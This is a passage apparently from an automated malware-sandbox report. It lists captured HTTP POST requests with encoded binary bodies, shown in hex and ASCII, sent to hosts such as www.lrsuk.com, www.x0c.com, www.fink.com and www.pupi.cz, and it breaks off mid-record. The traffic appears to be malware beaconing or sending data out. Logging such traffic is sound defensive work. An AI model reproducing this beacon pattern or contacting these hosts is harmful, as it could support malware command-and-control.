6d 58 47 46 63 38 63 55 3d Data Ascii: VukbKzk8hQn3CJcEyLjCr9JkYb0XVvSzfXq4wL99BoAZybtinPFBsrxZyWk5URoFPiypIw5L/8Ct0VpZbiYUIS9EQZyHTCn3pzQb9BTpCHknpSQdjYUY3kHxhRr09tdcEuv3ErRy6NCIwO3UNusenStPdXyMwKmBUYL4kqINFFZ5pYb+J/mF/FppZIPV3raYYqb6QbF+nIEhTB6JVesNGGf9YxE2GZzohCpGwNdFPoEkE6KrFd9el3Ts6zGjlZdIJJDcEHy4Z91IGSK5wFAIlh0WwqEAeSUDjEIgRvjCKqD83IJHM+h9lncGkEk8htDJcNQK/7lPiBR5fcctH2PP7+eD+lI676/fdqnQkVVgqH+7/kV7kgwAuOECR0tYBPyBuBgmCY58GlrDS1fSC5G937MyPUP6uFxHhT8tYIGtXHcMh7mlo1mrKrNWMOK+OqlINPzV9K3rHzfXsL8pTNSvJtX5ZuVXis8mU7FCMzkZqEfSwMgcomOiWnTFIOHNFFWTnUXt8W7Y4scEQpwgl3r6qgmOnjDU0t9yLjcqGpKx5WLxDbNiB2gmXGFc8cU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 7a 61 30 76 32 6d 73 64 78 51 6c 4d 39 73 39 4e 51 68 4f 64 4a 4e 51 4b 61 35 30 78 4c 44 43 39 7a 79 32 39 75 39 4d 6a 70 6a 44 76 55 6e 39 48 54 42 71 2b 62 4c 67 37 6f 74 55 54 70 42 47 62 31 4e 70 44 58 59 39 51 71 64 73 68 53 65 61 62 5a 4e 42 32 4d 6f 46 65 6c 33 62 30 6b 46 69 6a 78 66 69 79 69 63 4e 41 37 31 76 50 33 77 2f 79 4f 73 73 71 37 4d 70 5a 66 57 55 4a 70 45 6d 2b 6c 42 54 70 74 43 38 6f 75 5a 74 74 50 56 53 45 6a 6a 57 47 4d 73 6f 6f 66 64 6d 52 35 54 59 2b 32 64 4d 6c 31 66 4b 36 7a 74 46 33 68 7a 44 62 53 52 39 77 44 55 68 44 37 71 59 63 7a 6d 2f 36 6b 79 74 7a 78 48 51 47 4e 49 64 70 34 32 66 52 56 51 51 57 64 72 6a 5a 62 65 30 47 48 47 76 49 76 64 36 42 42 56 64 36 59 6e 73 77 51 48 47 4e 4f 41 46 35 37 30 4e 50 4b 46 64 6b 51 53 42 6b 51 61 72 66 52 41 69 32 55 76 52 63 76 45 4b 4c 35 67 71 6f 56 79 71 33 48 50 2b 61 4c 59 58 4f 56 66 56 39 6e 69 54 43 32 6d 6f 31 76 4b 58 73 49 77 44 4c 72 39 5a 50 35 68 49 4a 62 63 47 46 70 48 39 37 56 6f 6c 78 37 63 46 68 69 74 55 4f 6a 37 38 63 34 50 64 59 6f 59 77 55 54 6b 36 64 42 76 63 77 5a 51 2f 41 70 38 38 44 72 42 79 44 70 59 6b 43 64 72 76 6b 6b 56 61 37 4a 58 54 65 50 59 77 52 55 7a 4e 56 58 57 63 47 59 42 6b 43 43 32 76 70 58 39 56 39 44 6d 42 73 30 43 55 56 62 58 55 45 57 73 6d 50 30 78 77 34 65 54 6d 51 6e 45 54 41 4b 4b 45 34 76 61 78 43 48 38 35 4c 69 79 54 57 72 4d 57 6b 4f 45 6f 5a 58 50 58 54 57 4a 43 63 77 75 48 4f 6b 49 4d 48 6b 64 4c 53 4d 55 5a 52 69 43 4e 4b 4f 66 33 6c 47 57 47 72 58 31 71 6a 50 37 5a 78 41 36 58 72 6d 52 4b 36 56 78 55 54 69 41 31 4d 57 44 32 41 4a 50 68 44 6f 4b 31 68 32 31 6d 48 72 37 77 68 6b 2b 44 5a 33 43 4c 36 Data Ascii: za0v2msdxQlM9s9NQhOdJNQKa50xLDC9zy29u9MjpjDvUn9HTBq+bLg7otUTpBGb1NpDXY9QqdshSeabZNB2MoFel3b0kFijxfiyicNA71vP3w/yOssq7MpZfWUJpEm+lBTptC8ouZttPVSEjjWGMsoofdmR5TY+2dMl1fK6ztF3hzDbSR9wDUhD7qYczm/6kytzxHQGNIdp42fRVQQWdrjZbe0GHGvIvd6BBVd6YnswQHGNOAF570NPKFdkQSBkQarfRAi2UvRcvEKL5gqoVyq3HP+aLYXOVfV9niTC2mo1vKXsIwDLr9ZP5hIJbcGFpH97Volx7cFhitUOj78c4PdYoYwUTk6dBvcwZQ/Ap88DrByDpYkCdrvkkVa7JXTePYwRUzNVXWcGYBkCC2vpX9V9DmBs0CUVbXUEWsmP0xw4eTmQnETAKKE4vaxCH85LiyTWrMWkOEoZXPXTWJCcwuHOkIMHkdLSMUZRiCNKOf3lGWGrX1qjP7ZxA6XrmRK6VxUTiA1MWD2AJPhDoK1h21mHr7whk+DZ3CL6
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 5a 6c 47 76 66 42 55 55 77 67 6d 77 57 75 54 41 2f 46 5a 58 42 51 37 31 50 72 38 6a 45 59 67 70 47 51 4c 79 6a 4b 50 6c 55 2f 4b 48 50 39 45 78 55 52 59 48 48 31 44 4b 37 47 2b 65 68 36 35 64 75 74 4f 5a 6c 4d 69 36 51 73 43 6c 47 6e 4a 76 63 78 42 51 49 68 70 72 42 7a 46 6f 53 76 68 4b 36 42 36 5a 6d 43 33 68 5a 52 37 5a 67 67 6b 58 56 4a 6c 67 31 65 66 55 4b 74 54 34 38 58 4d 55 77 66 64 45 70 73 41 50 52 32 39 66 70 74 7a 6d 49 67 57 62 45 49 72 46 47 63 67 47 55 4d 61 34 79 5a 34 44 48 62 67 6a 55 45 46 72 43 4d 71 34 6e 4a 52 49 5a 4b 74 52 79 64 49 42 30 78 74 32 53 6a 54 30 77 4b 64 68 77 55 34 4d 4f 63 4b 6b 4b 49 55 32 55 30 64 4d 4b 6a 6d 42 49 70 78 72 59 50 30 4a 43 7a 33 61 69 4b 67 4f 35 7a 53 6d 56 46 36 77 4c 35 67 67 67 77 6b 61 45 37 66 4f 6e 68 69 77 4b 39 71 73 33 34 58 42 66 63 4e 71 53 31 79 76 66 31 48 78 68 55 63 31 72 68 4a 64 66 45 71 6d 4a 56 32 33 57 2b 75 57 74 4e 4e 66 54 4c 4d 46 51 4f 65 79 38 7a 6c 75 65 53 79 32 36 34 77 44 6c 6c 7a 36 33 58 6b 34 6c 4c 6a 2f 71 48 58 64 5a 44 70 63 57 6c 71 6f 37 32 54 62 75 53 75 36 73 69 71 46 55 6e 71 35 57 2f 74 30 79 54 51 78 57 58 54 61 5a 6b 44 70 2b 76 79 4c 65 33 67 56 70 41 51 72 65 6f 79 69 4c 36 53 61 6a 78 51 69 66 6b 51 66 42 6c 74 6f 48 66 72 6c 6e 33 6b 42 68 4b 63 33 77 72 31 66 7a 6f 68 77 71 4f 50 53 55 76 32 39 63 4f 4d 2b 4a 65 4e 4e 6c 68 50 2f 7a 4c 76 77 33 47 41 70 54 6d 32 35 74 4d 71 62 4a 79 4e 4d 32 59 55 6a 59 59 4e 34 49 4f 35 59 58 6f 55 42 4f 70 6a 70 71 76 37 76 76 45 39 6a 4d 58 4d 78 75 53 70 75 41 49 70 38 5a 50 37 42 31 56 71 67 4c 4a 76 62 4b 67 35 4f 69 4a 4f 39 62 50 65 2b 2b 70 31 74 73 53 53 51 65 32 2b 71 48 6b 7a 48 6c 57 7a 63 4d 54 4f 4b 7a 57 4d 2b 63 72 59 32 Data Ascii: ZlGvfBUUwgmwWuTA/FZXBQ71Pr8jEYgpGQLyjKPlU/KHP9ExURYHH1DK7G+eh65dutOZlMi6QsClGnJvcxBQIhprBzFoSvhK6B6ZmC3hZR7ZggkXVJlg1efUKtT48XMUwfdEpsAPR29fptzmIgWbEIrFGcgGUMa4yZ4DHbgjUEFrCMq4nJRIZKtRydIB0xt2SjT0wKdhwU4MOcKkKIU2U0dMKjmBIpxrYP0JCz3aiKgO5zSmVF6wL5gggwkaE7fOnhiwK9qs34XBfcNqS1yvf1HxhUc1rhJdfEqmJV23W+uWtNNfTLMFQOey8zlueSy264wDllz63Xk4lLj/qHXdZDpcWlqo72TbuSu6siqFUnq5W/t0yTQxWXTaZkDp+vyLe3gVpAQreoyiL6SajxQifkQfBltoHfrln3kBhKc3wr1fzohwqOPSUv29cOM+JeNNlhP/zLvw3GApTm25tMqbJyNM2YUjYYN4IO5YXoUBOpjpqv7vvE9jMXMxuSpuAIp8ZP7B1VqgLJvbKg5OiJO9bPe++p1tsSSQe2+qHkzHlWzcMTOKzWM+crY2
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 7a 61 30 76 32 6d 73 64 78 51 6c 4d 39 73 39 4e 51 68 4f 64 4a 4e 51 4b 61 35 30 78 4c 44 43 39 7a 79 32 39 75 39 4d 6a 70 6a 44 76 55 6e 39 48 54 42 71 2b 62 4c 67 37 6f 74 55 54 70 42 47 62 31 4e 70 44 58 59 39 51 71 64 73 68 53 65 61 62 5a 4e 42 32 4d 6f 46 65 6c 33 62 30 6b 46 69 6a 78 66 69 79 69 63 4e 41 37 31 76 50 33 77 2f 79 4f 73 73 71 37 4d 70 5a 66 57 55 4a 70 45 6d 2b 6c 42 54 70 74 43 38 6f 75 5a 74 74 50 56 53 45 6a 6a 57 47 4d 73 6f 6f 66 64 6d 52 35 54 59 2b 32 64 4d 6c 31 66 4b 36 7a 74 46 33 68 7a 44 62 53 52 39 77 44 55 68 44 37 71 59 63 7a 6d 2f 36 6b 79 74 7a 78 48 51 47 4e 49 64 70 34 32 66 52 56 51 51 57 64 72 6a 5a 62 65 30 47 48 47 76 49 76 64 36 42 42 56 64 36 59 6e 73 77 51 48 47 4e 4f 41 46 35 37 30 4e 50 4b 46 64 6b 51 53 42 6b 51 61 72 66 52 41 69 32 55 76 52 63 76 45 4b 4c 35 67 71 6f 56 79 71 33 48 50 2b 61 4c 59 58 4f 56 66 56 39 6e 69 54 43 32 6d 6f 31 76 4b 58 73 49 77 44 4c 72 39 5a 50 35 68 49 4a 62 63 47 46 70 48 39 37 56 6f 6c 78 37 63 46 68 69 74 55 4f 6a 37 38 63 34 50 64 59 6f 59 77 55 54 6b 36 64 42 76 63 77 5a 51 2f 41 70 38 38 44 72 42 79 44 70 59 6b 43 64 72 76 6b 6b 56 61 37 4a 58 54 65 50 59 77 52 55 7a 4e 56 58 57 63 47 59 42 6b 43 43 32 76 70 58 39 56 39 44 6d 42 73 30 43 55 56 62 58 55 45 57 73 6d 50 30 78 77 34 65 54 6d 51 6e 45 54 41 4b 4b 45 34 76 61 78 43 48 38 35 4c 69 79 54 57 72 4d 57 6b 4f 45 6f 5a 58 50 58 54 57 4a 43 63 77 75 48 4f 6b 49 4d 48 6b 64 4c 53 4d 55 5a 52 69 43 4e 4b 4f 66 33 6c 47 57 47 72 58 31 71 6a 50 37 5a 78 41 36 58 72 6d 52 4b 36 56 78 55 54 69 41 31 4d 57 44 32 41 4a 50 68 44 6f 4b 31 68 32 31 6d 48 72 37 77 68 6b 2b 44 5a 33 43 4c 36 Data Ascii: za0v2msdxQlM9s9NQhOdJNQKa50xLDC9zy29u9MjpjDvUn9HTBq+bLg7otUTpBGb1NpDXY9QqdshSeabZNB2MoFel3b0kFijxfiyicNA71vP3w/yOssq7MpZfWUJpEm+lBTptC8ouZttPVSEjjWGMsoofdmR5TY+2dMl1fK6ztF3hzDbSR9wDUhD7qYczm/6kytzxHQGNIdp42fRVQQWdrjZbe0GHGvIvd6BBVd6YnswQHGNOAF570NPKFdkQSBkQarfRAi2UvRcvEKL5gqoVyq3HP+aLYXOVfV9niTC2mo1vKXsIwDLr9ZP5hIJbcGFpH97Volx7cFhitUOj78c4PdYoYwUTk6dBvcwZQ/Ap88DrByDpYkCdrvkkVa7JXTePYwRUzNVXWcGYBkCC2vpX9V9DmBs0CUVbXUEWsmP0xw4eTmQnETAKKE4vaxCH85LiyTWrMWkOEoZXPXTWJCcwuHOkIMHkdLSMUZRiCNKOf3lGWGrX1qjP7ZxA6XrmRK6VxUTiA1MWD2AJPhDoK1h21mHr7whk+DZ3CL6
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 76 31 62 56 42 59 61 58 72 51 6e 6b 57 65 72 46 6f 51 6d 31 73 4b 6c 61 72 54 7a 6d 43 2f 63 4b 47 72 52 63 48 6b 7a 46 42 54 7a 47 41 4a 79 4a 4a 42 55 6d 58 73 32 6d 34 4f 70 52 6f 51 2b 6d 7a 35 70 41 5a 76 45 44 39 34 2b 4e 31 31 33 54 51 72 6a 4c 76 65 30 46 63 38 44 31 77 79 6a 39 74 37 71 35 51 49 59 4b 55 77 63 43 73 75 71 74 6e 64 2b 55 59 34 4a 5a 70 33 36 79 38 58 7a 71 30 71 72 73 67 42 5a 63 43 48 68 78 72 6c 36 43 4a 54 66 36 6b 52 5a 4a 7a 50 78 39 43 66 6f 66 72 38 41 4c 6d 67 6e 6b 53 4e 47 35 4e 4c 6e 57 4a 6b 62 71 68 6f 2b 37 56 48 48 2f 36 62 49 74 42 70 53 47 70 44 57 73 46 52 6b 31 52 47 62 2b 78 4a 69 65 64 63 74 51 59 71 73 31 65 36 72 44 42 53 48 66 5a 6f 30 4d 6b 33 36 4d 4a 71 4f 44 51 73 39 30 53 56 41 77 35 57 67 6c 33 71 37 6c 35 30 42 45 4b 4f 76 6b 51 45 2b 42 54 39 37 79 44 66 4f 5a 4c 70 32 44 50 58 33 6e 33 6f 6c 4a 34 62 57 76 33 36 6b 65 59 30 32 66 55 49 69 48 4c 71 69 42 78 79 46 66 5a 79 47 61 42 2b 38 34 75 50 46 33 67 50 62 6b 36 44 61 32 4e 6e 53 38 50 5a 69 5a 54 35 52 6c 76 48 77 50 63 56 62 6c 61 63 4e 62 61 52 69 46 2b 7a 52 32 43 2b 47 43 43 59 6b 4a 61 4b 47 54 54 57 76 6b 5a 6b 32 4c 2b 4f 2b 74 72 7a 38 31 43 36 79 31 7a 2b 43 35 42 4d 46 7a 71 37 2f 76 30 52 38 48 56 62 79 36 57 7a 75 6b 41 35 43 6d 6b 4a 4f 6d 4d 32 70 33 4e 64 6a 53 45 65 46 62 76 31 39 44 65 4a 6a 73 76 66 2b 33 67 4b 55 59 50 53 30 74 2f 67 33 53 68 30 79 68 63 59 77 44 38 32 4e 4f 4f 58 79 64 48 77 44 47 2b 70 57 50 53 72 79 6b 67 66 2b 32 74 47 6d 2f 57 77 38 6e 4e 30 70 49 36 44 66 71 31 62 5a 69 46 74 6c 37 33 61 51 67 39 42 4b 6e 66 61 7a 5a 72 59 36 39 30 70 52 31 61 57 33 37 50 51 38 6f 46 72 69 2b 2f 71 56 31 38 34 5a 42 75 4a 53 61 53 51 66 68 6d 39 39 41 54 51 55 74 74 6b 46 43 33 55 57 67 50 48 6f 61 56 73 52 53 48 49 45 52 43 36 51 6e 78 77 3d 3d Data Ascii: v1bVBYaXrQnkWerFoQm1sKlarTzmC/cKGrRcHkzFBTzGAJyJJBUmXs2m4OpRoQ+mz5pAZvED94+N113TQrjLve0Fc8D1wyj9t7q5QIYKUwcCsuqtnd+UY4JZp36y8Xzq0qrsgBZcCHhxrl6CJTf6kRZJzPx9Cfofr8ALmgnkSNG5NLnWJkbqho+7VHH/6bItBpSGpDWsFRk1RGb+xJiedctQYqs1e6rDBSHfZo0Mk36MJqODQs90SVAw5Wgl3q7l50BEKOvkQE+BT97yDfOZLp2DPX3n3olJ4bWv36keY02fUIiHLqiBxyFfZyGaB+84uPF3gPbk6Da2NnS8PZiZT5RlvHwPcVblacNbaRiF+zR2C+GCCYkJaKGTTWvkZk2L+O+trz81C6y1z+C5BMFzq7/v0R8HVby6WzukA5CmkJOmM2p3NdjSEeFbv19DeJjsvf+3gKUYPS0t/g3Sh0yhcYwD82NOOXydHwDG+pWPSrykgf+2tGm/Ww8nN0pI6Dfq1bZiFtl73aQg9BKnfazZrY690pR1aW37PQ8oFri+/qV184ZBuJSaSQfhm99ATQUttkFC3UWgPHoaVsRSHIERC6Qnxw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4b 31 49 4b 61 51 4c 42 79 51 6e 30 33 34 42 31 39 59 7a 47 39 34 56 4a 54 61 55 53 43 56 62 4e 56 74 64 61 6a 78 6f 47 6b 37 4d 37 68 56 4e 31 58 77 6d 54 39 4a 47 78 6f 6c 75 6c 48 76 34 52 43 71 6e 54 42 77 5a 41 70 6f 36 56 30 62 31 79 6e 4a 35 68 64 78 6d 51 59 64 51 75 66 70 56 6b 69 76 73 49 64 2f 43 36 4e 4d 72 31 2f 44 77 6f 32 52 70 63 55 2b 45 57 67 5a 58 42 54 75 56 54 48 38 36 70 53 56 47 69 52 53 37 51 46 67 44 61 52 79 46 59 31 2f 71 7a 49 33 69 33 43 4f 45 47 6f 58 58 56 37 73 54 38 51 70 4a 6e 76 6c 55 54 56 2b 72 52 33 6d 75 4a 50 55 63 58 44 79 73 36 37 69 6c 6c 4c 53 66 6d 35 4f 2b 62 6f 78 4a 52 65 6c 2f 37 50 2f 4c 55 56 36 39 38 33 36 6e 46 46 47 30 70 42 53 36 6c 6b 44 2f 34 71 6b 2b 63 7a 38 46 67 4d 50 55 32 58 4e 64 42 79 39 68 4d 69 6a 63 63 42 49 32 59 61 45 2f 77 65 33 78 42 46 75 6a 52 67 49 39 31 45 37 7a 53 47 2f 57 73 5a 30 35 75 34 6b 50 63 55 35 51 41 66 47 33 70 74 53 4b 41 31 58 58 77 35 48 63 53 42 31 4b 49 5a 61 6f 70 34 4c 36 78 31 4e 2f 42 41 57 6d 52 66 54 34 45 6e 67 73 79 35 71 67 65 59 44 6d 2b 73 33 73 6c 4e 58 67 64 34 4f 36 33 34 59 76 58 6d 68 79 4f 66 79 66 35 73 75 6c 38 45 7a 58 71 4f 59 34 74 6d 42 4e 4a 44 33 41 7a 44 6a 44 4e 51 46 4d 50 61 44 4a 4c 74 6d 70 46 6f 34 75 59 72 56 66 56 6a 30 34 63 2b 6a 76 2b 77 63 52 76 4d 45 6d 74 74 4c 31 4e 38 58 72 43 45 53 50 6e 46 42 4a 4c 41 48 62 6c 4f 52 68 62 55 43 78 6e 51 6d 48 76 55 70 46 4b 41 73 5a 75 31 33 69 73 45 48 79 4f 64 6c 6d 41 54 43 56 66 65 70 6d 49 76 38 55 4f 39 54 55 6c 49 79 2b 58 43 66 5a 55 52 33 58 67 6f 6a 4e 4f 41 6e 42 32 34 48 36 69 52 47 6d 53 4d 59 66 53 51 73 6e 4d 5a 7a 73 3d Data Ascii: K1IKaQLByQn034B19YzG94VJTaUSCVbNVtdajxoGk7M7hVN1XwmT9JGxolulHv4RCqnTBwZApo6V0b1ynJ5hdxmQYdQufpVkivsId/C6NMr1/Dwo2RpcU+EWgZXBTuVTH86pSVGiRS7QFgDaRyFY1/qzI3i3COEGoXXV7sT8QpJnvlUTV+rR3muJPUcXDys67illLSfm5O+boxJRel/7P/LUV69836nFFG0pBS6lkD/4qk+cz8FgMPU2XNdBy9hMijccBI2YaE/we3xBFujRgI91E7zSG/WsZ05u4kPcU5QAfG3ptSKA1XXw5HcSB1KIZaop4L6x1N/BAWmRfT4Engsy5qgeYDm+s3slNXgd4O634YvXmhyOfyf5sul8EzXqOY4tmBNJD3AzDjDNQFMPaDJLtmpFo4uYrVfVj04c+jv+wcRvMEmttL1N8XrCESPnFBJLAHblORhbUCxnQmHvUpFKAsZu13isEHyOdlmATCVfepmIv8UO9TUlIy+XCfZUR3XgojNOAnB24H6iRGmSMYfSQsnMZzs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4b 31 49 4b 61 51 4c 42 79 51 6e 30 33 34 42 31 39 59 7a 47 39 34 56 4a 54 61 55 53 43 56 62 4e 56 74 64 61 6a 78 6f 47 6b 37 4d 37 68 56 4e 31 58 77 6d 54 39 4a 47 78 6f 6c 75 6c 48 76 34 52 43 71 6e 54 42 77 5a 41 70 6f 36 56 30 62 31 79 6e 4a 35 68 64 78 6d 51 59 64 51 75 66 70 56 6b 69 76 73 49 64 2f 43 36 4e 4d 72 31 2f 44 77 6f 32 52 70 63 55 2b 45 57 67 5a 58 42 54 75 56 54 48 38 36 70 53 56 47 69 52 53 37 51 46 67 44 61 52 79 46 59 31 2f 71 7a 49 33 69 33 43 4f 45 47 6f 58 58 56 37 73 54 38 51 70 4a 6e 76 6c 55 54 56 2b 72 52 33 6d 75 4a 50 55 63 58 44 79 73 36 37 69 6c 6c 4c 53 66 6d 35 4f 2b 62 6f 78 4a 52 65 6c 2f 37 50 2f 4c 55 56 36 39 38 33 36 6e 46 46 47 30 70 42 53 36 6c 6b 44 2f 34 71 6b 2b 63 7a 38 46 67 4d 50 55 32 58 4e 64 42 79 39 68 4d 69 6a 63 63 42 49 32 59 61 45 2f 77 65 33 78 42 46 75 6a 52 67 49 39 31 45 37 7a 53 47 2f 57 73 5a 30 35 75 34 6b 50 63 55 35 51 41 66 47 33 70 74 53 4b 41 31 58 58 77 35 48 63 53 42 31 4b 49 5a 61 6f 70 34 4c 36 78 31 4e 2f 42 41 57 6d 52 66 54 34 45 6e 67 73 79 35 71 67 65 59 44 6d 2b 73 33 73 6c 4e 58 67 64 34 4f 36 33 34 59 76 58 6d 68 79 4f 66 79 66 35 73 75 6c 38 45 7a 58 71 4f 59 34 74 6d 42 4e 4a 44 33 41 7a 44 6a 44 4e 51 46 4d 50 61 44 4a 4c 74 6d 70 46 6f 34 75 59 72 56 66 56 6a 30 34 63 2b 6a 76 2b 77 63 52 76 4d 45 6d 74 74 4c 31 4e 38 58 72 43 45 53 50 6e 46 42 4a 4c 41 48 62 6c 4f 52 68 62 55 43 78 6e 51 6d 48 76 55 70 46 4b 41 73 5a 75 31 33 69 73 45 48 79 4f 64 6c 6d 41 54 43 56 66 65 70 6d 49 76 38 55 4f 39 54 55 6c 49 79 2b 58 43 66 5a 55 52 33 58 67 6f 6a 4e 4f 41 6e 42 32 34 48 36 69 52 47 6d 53 4d 59 66 53 51 73 6e 4d 5a 7a 73 3d Data Ascii: K1IKaQLByQn034B19YzG94VJTaUSCVbNVtdajxoGk7M7hVN1XwmT9JGxolulHv4RCqnTBwZApo6V0b1ynJ5hdxmQYdQufpVkivsId/C6NMr1/Dwo2RpcU+EWgZXBTuVTH86pSVGiRS7QFgDaRyFY1/qzI3i3COEGoXXV7sT8QpJnvlUTV+rR3muJPUcXDys67illLSfm5O+boxJRel/7P/LUV69836nFFG0pBS6lkD/4qk+cz8FgMPU2XNdBy9hMijccBI2YaE/we3xBFujRgI91E7zSG/WsZ05u4kPcU5QAfG3ptSKA1XXw5HcSB1KIZaop4L6x1N/BAWmRfT4Engsy5qgeYDm+s3slNXgd4O634YvXmhyOfyf5sul8EzXqOY4tmBNJD3AzDjDNQFMPaDJLtmpFo4uYrVfVj04c+jv+wcRvMEmttL1N8XrCESPnFBJLAHblORhbUCxnQmHvUpFKAsZu13isEHyOdlmATCVfepmIv8UO9TUlIy+XCfZUR3XgojNOAnB24H6iRGmSMYfSQsnMZzs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheData Raw: 36 70 37 6a 6e 5a 7a 49 30 77 6e 4c 6e 76 49 47 78 30 74 61 74 53 2b 71 56 38 61 30 75 57 4b 6f 6b 42 4f 75 6f 33 75 47 73 42 57 44 62 61 6c 42 46 38 66 50 4b 4f 35 58 35 50 74 6b 33 2f 2f 6d 45 71 66 65 54 63 7a 43 30 34 74 66 77 53 69 73 51 79 61 55 4f 63 4b 6f 70 4f 69 33 4c 7a 48 74 39 2f 4a 62 33 69 4b 46 35 4e 42 4f 32 79 36 5a 6e 48 41 6d 2f 34 4a 62 44 38 34 50 47 73 35 62 76 45 70 31 76 37 72 74 6b 4a 30 66 37 53 37 6c 4f 48 6d 5a 4b 79 65 55 71 53 79 47 2b 33 59 4b 61 31 72 2f 73 67 48 5a 42 79 72 2b 34 4d 61 41 46 47 4f 54 61 37 41 4d 6f 73 2b 66 57 78 7a 38 45 33 71 34 71 4a 6a 69 35 68 4c 66 6c 49 2f 63 36 67 50 36 71 42 50 4f 42 79 63 74 76 53 2b 42 49 34 59 77 47 41 7a 32 50 6d 54 51 5a 31 71 62 41 72 47 44 53 32 31 48 73 32 41 65 33 59 43 77 74 2b 75 61 69 59 4d 47 30 41 6d 6c 4d 44 55 36 49 34 36 44 36 4c 76 36 45 49 64 79 49 38 56 36 2b 70 6c 6d 66 30 5a 6f 4b 57 36 77 6a 31 47 4f 6d 43 6f 54 37 41 51 35 4d 58 62 62 61 49 56 59 75 79 43 39 2f 75 4a 44 2b 78 46 55 54 30 7a 33 6f 30 52 73 72 32 38 44 4c 73 6f 6c 54 41 38 61 4e 35 5a 6c 6d 42 56 63 79 71 48 73 46 33 77 78 76 2b 71 57 4d 45 75 72 59 2b 53 6a 79 32 42 48 74 56 41 51 48 75 4a 5a 53 4e 6f 45 43 6b 78 61 73 54 6e 34 37 67 4d 39 6f 32 35 51 6e 56 6e 4e 37 2f 56 61 41 50 30 2f 37 64 32 4e 69 53 2b 4e 78 36 5a 75 47 62 59 6c 74 4d 53 44 35 71 6a 52 47 41 56 36 48 4f 4f 42 67 64 37 79 6d 57 42 33 54 68 44 37 2f 47 63 61 69 6b 79 57 6e 49 42 37 32 58 59 79 48 52 41 53 6e 4f 6c 37 73 77 4b 66 37 6d 61 75 30 36 77 78 77 56 6b 32 37 6a 76 51 69 4a 43 6a 47 34 77 36 48 30 71 2b 6b 54 50 55 4a 58 34 53 61 49 69 5a Data Ascii: 6p7jnZzI0wnLnvIGx0tatS+qV8a0uWKokBOuo3uGsBWDbalBF8fPKO5X5Ptk3//mEqfeTczC04tfwSisQyaUOcKopOi3LzHt9/Jb3iKF5NBO2y6ZnHAm/4JbD84PGs5bvEp1v7rtkJ0f7S7lOHmZKyeUqSyG+3YKa1r/sgHZByr+4MaAFGOTa7AMos+fWxz8E3q4qJji5hLflI/c6gP6qBPOByctvS+BI4YwGAz2PmTQZ1qbArGDS21Hs2Ae3YCwt+uaiYMG0AmlMDU6I46D6Lv6EIdyI8V6+plmf0ZoKW6wj1GOmCoT7AQ5MXbbaIVYuyC9/uJD+xFUT0z3o0Rsr28DLsolTA8aN5ZlmBVcyqHsF3wxv+qWMEurY+Sjy2BHtVAQHuJZSNoECkxasTn47gM9o25QnVnN7/VaAP0/7d2NiS+Nx6ZuGbYltMSD5qjRGAV6HOOBgd7ymWB3ThD7/GcaikyWnIB72XYyHRASnOl7swKf7mau06wxwVk27jvQiJCjG4w6H0q+kTPUJX4SaIiZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 75 67 7a 76 5a 36 6a 6c 66 67 6c 74 57 5a 4c 33 61 34 7a 4a 74 42 73 6e 58 6e 75 77 57 59 6d 69 58 46 74 37 41 55 66 58 30 54 71 6e 49 46 69 72 70 75 72 4d 4d 79 71 38 68 76 67 45 34 41 36 53 6b 49 73 66 67 41 4a 47 4f 4a 78 55 67 35 53 4b 39 6e 5a 70 68 59 4d 75 4d 2f 65 6e 2f 73 77 70 74 75 76 4e 4c 4e 68 47 51 59 41 56 30 55 31 45 50 43 50 48 61 65 33 74 65 6a 46 41 37 34 34 58 44 50 56 2f 63 74 73 76 36 30 34 77 5a 77 5a 57 30 70 41 59 36 67 55 76 56 68 6d 53 38 4c 37 33 43 33 71 46 53 67 72 37 6f 30 72 67 4c 57 77 79 71 77 44 72 4a 55 48 6b 7a 51 6f 42 5a 73 42 44 35 35 46 68 6d 76 4a 6e 33 6e 67 75 34 44 48 75 74 75 59 6a 68 73 77 59 34 71 4a 45 56 4a 43 33 45 32 64 47 63 56 4c 33 78 31 71 50 76 6c 76 79 64 76 42 69 47 32 71 33 57 7a 4d 47 7a 66 66 41 67 6f 36 6d 37 31 42 7a 6d 79 71 70 42 42 63 73 32 6a 4d 6d 35 6f 5a 47 62 4f 68 43 4d 31 51 61 32 67 4f 74 72 4e 45 67 35 33 31 2f 36 64 31 65 6b 45 71 30 68 50 42 69 77 36 2f 69 34 62 71 36 45 4c 57 4e 61 57 50 7a 55 38 44 61 5a 44 63 4a 34 73 59 31 6a 31 75 6e 71 32 58 31 4c 45 33 52 35 41 4e 64 36 4a 6a 30 6c 35 4c 38 45 59 48 32 6c 75 36 64 4d 51 4b 71 